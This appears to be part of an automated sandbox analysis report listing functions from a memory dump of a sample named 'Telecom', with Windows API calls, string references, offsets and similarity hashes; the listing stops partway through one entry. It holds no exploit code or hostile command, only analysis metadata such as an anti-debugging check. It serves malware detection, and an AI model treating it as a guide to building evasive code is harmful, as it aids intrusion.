Function 00452B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00453006

Strings

bnJ, xrefs: 00452B36, 00452E8D
CALL, xrefs: 00452FD6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bnJ
API String ID: 1385522511-3433157237
Opcode ID: 9c33fbf87b67effe210aa378ff118a9e0a0c0abff454fa03b7c79cdfc7168f92
Instruction ID: e924f2048f7037fee93b2bc234474a235dab3978b92d653a835bb6664bfaab09
Opcode Fuzzy Hash: 9c33fbf87b67effe210aa378ff118a9e0a0c0abff454fa03b7c79cdfc7168f92
Instruction Fuzzy Hash: 77229D706083019FC714CF25C481A2ABBF1BF95315F14895FF8958B3A2D779E949CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00443A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 0048413B

Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871

Part of subcall function 00443A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00443A76

Strings

X, xrefs: 00484109
`uP, xrefs: 00484134

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`uP
API String ID: 779396738-2430950425
Opcode ID: 405018cce4391e96c4e351dd72223ee7afda92f3f5cce19dc0443001dc37d689
Instruction ID: a9a3b218ece0a80bd29fe9b050fb20a6e032c66f7d91c6d06e631a870a7b0531
Opcode Fuzzy Hash: 405018cce4391e96c4e351dd72223ee7afda92f3f5cce19dc0443001dc37d689
Instruction Fuzzy Hash: 20218171A0025C9BDF01DF95C805BEE7BF8AF49718F00805AE545B7281DBF89A898F69

Uniqueness

Uniqueness Score: -1.00%

Function 0046014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004609D8

Part of subcall function 00463614: RaiseException.KERNEL32(?,?,?,004609FA,?,00000000,?,?,?,?,?,?,004609FA,00000000,00509758,00000000), ref: 00463674

__CxxThrowException@8.LIBVCRUNTIME ref: 004609F5

Strings

Unknown exception, xrefs: 00460A02

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 43daa725523746c5b6f374e25af65388c25fe189ece617816860ce1d10ee6b2d
Instruction ID: bd4cdb2174e7360007873bf5e91c3fc3f8e6e11a745bea48721e39bbb137574e
Opcode Fuzzy Hash: 43daa725523746c5b6f374e25af65388c25fe189ece617816860ce1d10ee6b2d
Instruction Fuzzy Hash: C1F0287490020CB7CF10BAAADC0289F776C5E01358B50402BB924961E2FB79EA1AC6DB

Uniqueness

Uniqueness Score: -1.00%

Function 004C89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004C8D52
TerminateProcess.KERNEL32(00000000), ref: 004C8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 004C8F3A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: c3e8b7bc86842aedc9e73ca2e20c43c546409bb30fc3d9fa381a66b11896fc8c
Instruction ID: 5d9921dfd74f9584e22920d594df39277c1afcbd79e4e234c54aee8a28b08d10
Opcode Fuzzy Hash: c3e8b7bc86842aedc9e73ca2e20c43c546409bb30fc3d9fa381a66b11896fc8c
Instruction Fuzzy Hash: 05127B75A083009FD750DF28C484B6ABBE1FF85318F14895EE8898B352CB39ED45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004C9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004C9B87
_strcat.LIBCMT ref: 004C9BC6
_wcslen.LIBCMT ref: 004C9C14

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: b6534f638207c27b1a19e3a31c5f12b49e4d27ef4ef2eea58cf7414f193263fb
Instruction ID: 2e2c588e32121d3d0ad8d3f661712251a4b7913a93e30d8087a0db539d869d14
Opcode Fuzzy Hash: b6534f638207c27b1a19e3a31c5f12b49e4d27ef4ef2eea58cf7414f193263fb
Instruction Fuzzy Hash: 83A18C34600505EFCB58DF19C5D5A69B7A1FF45318B2484AEE80A8F392DB39ED42CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00446D47 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 00446DEE
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00446DFE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b75c6c9d3be39195151941a71bc7d97ee44ee85420d740dcc3a82e749786203a
Instruction ID: 612f212cc6510a41d2de4f0691a26e8233863a539e642c1a0e380889f90bbdc6
Opcode Fuzzy Hash: b75c6c9d3be39195151941a71bc7d97ee44ee85420d740dcc3a82e749786203a
Instruction Fuzzy Hash: EB318B71A00609EFEB14CF28C880B99B7B4FB48314F15862AE91497340C7B5FEA4DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0045FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004461A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00446299

KillTimer.USER32(?,00000001,?,?), ref: 0045FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0045FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0049FE33

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 33cd7f4c23813cb57d07ebc3febb2b846ffb5e5901b4e0e22b504304e6e663a1
Instruction ID: e735645ed16662dbdc19fc979628968a36c52182138b7d9f21895053f1c25aa5
Opcode Fuzzy Hash: 33cd7f4c23813cb57d07ebc3febb2b846ffb5e5901b4e0e22b504304e6e663a1
Instruction Fuzzy Hash: 3D318471904344AFEF228F248855BE7BFEC9B16308F0044AFD59A97242D3781A8DCB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0047970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,004797BA,FF8BC369,00000000,00000002,00000000), ref: 00479744
GetLastError.KERNEL32(?,004797BA,FF8BC369,00000000,00000002,00000000,?,00475ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00466F41), ref: 0047974E
__dosmaperr.LIBCMT ref: 00479755

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 87f9eecf6e9a4a14f17a9e1c95bd8890a0f724d26739ffc35c735400532c933d
Instruction ID: 1c8b9b404f5d09a643e5a4fc08f97a9400f7cc914e12d74be1fa59ecea1a2d1f
Opcode Fuzzy Hash: 87f9eecf6e9a4a14f17a9e1c95bd8890a0f724d26739ffc35c735400532c933d
Instruction Fuzzy Hash: 2B014032620514EBCB099F99DC05CEF3729DB85330F24425BF8159B290E674DD429795

Uniqueness

Uniqueness Score: -1.00%

Function 0044425F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443462,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004442A0

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Strings

$Q, xrefs: 004442BA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID: $Q
API String ID: 4019309064-162862168
Opcode ID: be1c8d003a2cd88320748d7453ec557e8d8a9aa8b9d071a2168e6329ec527edc
Instruction ID: 07534cbc1114ab882b21d66071e285bd9fe26cd1df61260940abefd1e388c897
Opcode Fuzzy Hash: be1c8d003a2cd88320748d7453ec557e8d8a9aa8b9d071a2168e6329ec527edc
Instruction Fuzzy Hash: 62115231900219AAEF10EB658901FDD77E8BF48398F4044ABB94597291DEB8D7C4972D

Uniqueness

Uniqueness Score: -1.00%

Function 0044AFA0 Relevance: 3.2, APIs: 2, Instructions: 236fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,0044AF30,?,?,?), ref: 0044B0EC
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,0044AF30,?,?,?), ref: 0049072B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 1898cd08a5294a1d9cfbd4b67a725aa326c8e924a0f0e0b4d460bf040b6e92a5
Instruction ID: f9640dd33a942d56d4d43659aed234e3ffdf40b958b2dd953897f5dd137109b5
Opcode Fuzzy Hash: 1898cd08a5294a1d9cfbd4b67a725aa326c8e924a0f0e0b4d460bf040b6e92a5
Instruction Fuzzy Hash: 7E91D170904205EFEF10CF65C8817AABBB4FF05310F1481A6E8259B385D77AE951DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045FFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 0046007D
TerminateProcess.KERNEL32 ref: 0046008F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ChangeCloseFindNotificationProcessTerminate
String ID:
API String ID: 630213059-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: bd8e185c30cb8d7b1350b49b76d00313cd4eff534e87af57d4b5a78681d32bd9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1931B571A00105DFD718DF58E490A6AFBA5FB59300B2486A6E409CB752E736EDC1CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 0044396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00443A3C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 43090afe19d1a5cad9650acc61d455636083ced52045943e8b963b431e561f9a
Instruction ID: 300d78a4e2b71faf24985a6e36bb0fdaddc4eb952fc81a6071abbbad8910790e
Opcode Fuzzy Hash: 43090afe19d1a5cad9650acc61d455636083ced52045943e8b963b431e561f9a
Instruction Fuzzy Hash: AF31AEB06043019FE720DF24D884797BBE8FB59709F00092EE5DA97341E7B8AA58CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004AD538 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004AD559
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 004AD58D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: ee88fe5f9b043068ba94d9fdd9940e39baba0ac80526476c12966770117a7bea
Instruction ID: 13c30685faf4f8360a9f5b2a722f62f4f4a4bebb607fff7f7578127b32e20ef9
Opcode Fuzzy Hash: ee88fe5f9b043068ba94d9fdd9940e39baba0ac80526476c12966770117a7bea
Instruction Fuzzy Hash: 4D01ADB2A151007FAB1C7BAADC0BC7F7AAECB8A354700023FB502C7151E9A4AC018679

Uniqueness

Uniqueness Score: -1.00%

Function 00446FA2 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 004859E0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: afe64834058244d2baf7732016c4a05bf5987639249a62402c7b1abf33a7a028
Instruction ID: d62822bd0932c35e8d9a68cdedbab34aaeebb66b072d1f19fefac06604383474
Opcode Fuzzy Hash: afe64834058244d2baf7732016c4a05bf5987639249a62402c7b1abf33a7a028
Instruction Fuzzy Hash: D3019230241231B6E3301A26DC0EF9B7F98EF027B4F118312FEA96A1E0C7B85854CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0044333D

Part of subcall function 004432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004432FB
Part of subcall function 004432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00443312

Part of subcall function 0044338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00443368,?), ref: 004433BB
Part of subcall function 0044338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00443368,?), ref: 004433CE
Part of subcall function 0044338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00512418,00512400,?,?,?,?,?,?,00443368,?), ref: 0044343A
Part of subcall function 0044338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004434BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00443377

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 7ee953c3f54a3c7b68df0d4d686441bf8e51ccc47e10a1309646165cf4354bc4
Instruction ID: f7b76d46eb4606f0f89e7559a9928b54972fc650a2b60afcc084768196658f6e
Opcode Fuzzy Hash: 7ee953c3f54a3c7b68df0d4d686441bf8e51ccc47e10a1309646165cf4354bc4
Instruction Fuzzy Hash: FDF05431554744AFF7006F60EC0BBA47794A714B0FF008C1FB914851E2DBBD4169AB49

Uniqueness

Uniqueness Score: -1.00%

Function 0045F950 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0045F96C
Sleep.KERNEL32(00000000), ref: 0049FB22

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 8e6f9ae1fbf644cd08381cf0d62c0164fef049af1452dc4b263eda6a0e488019
Instruction ID: 86e220d8dcec77ebe749c1357ad0e2a5a25acf5fa4abe031ede1fcfbc4f0606a
Opcode Fuzzy Hash: 8e6f9ae1fbf644cd08381cf0d62c0164fef049af1452dc4b263eda6a0e488019
Instruction Fuzzy Hash: 56F05E71200605AFD354AF7AD455B56BBE9BB44751F04403AE819C7261DB64A804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004487C8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0044AF3F,?,?,?), ref: 004487E7
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0044AF3F,?,?,?), ref: 0044881D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 427f1b69ac67d3724a4f534fa560e0106985f81ae660c1f55aec5cff0a6a4089
Instruction ID: a7b3b6f401bd331878d4f0182a004cb2f1f1f827761b420b1c2b9079cd3ea7c1
Opcode Fuzzy Hash: 427f1b69ac67d3724a4f534fa560e0106985f81ae660c1f55aec5cff0a6a4089
Instruction Fuzzy Hash: DB01F2713011007FFB18AB6A9C0BF7F7AADCB89740F10403FB102DA1E0EEA19C008229

Uniqueness

Uniqueness Score: -1.00%

Function 0044CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0044CEEE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 190f44faffa3e9f25b49560f42e85b1bf689ac9bc34fdc2ed8026d49370dd1e7
Instruction ID: 1caa1443219097a215db6d92e9c481af15d1d0d9531abd959e7e09ac17a54ef2
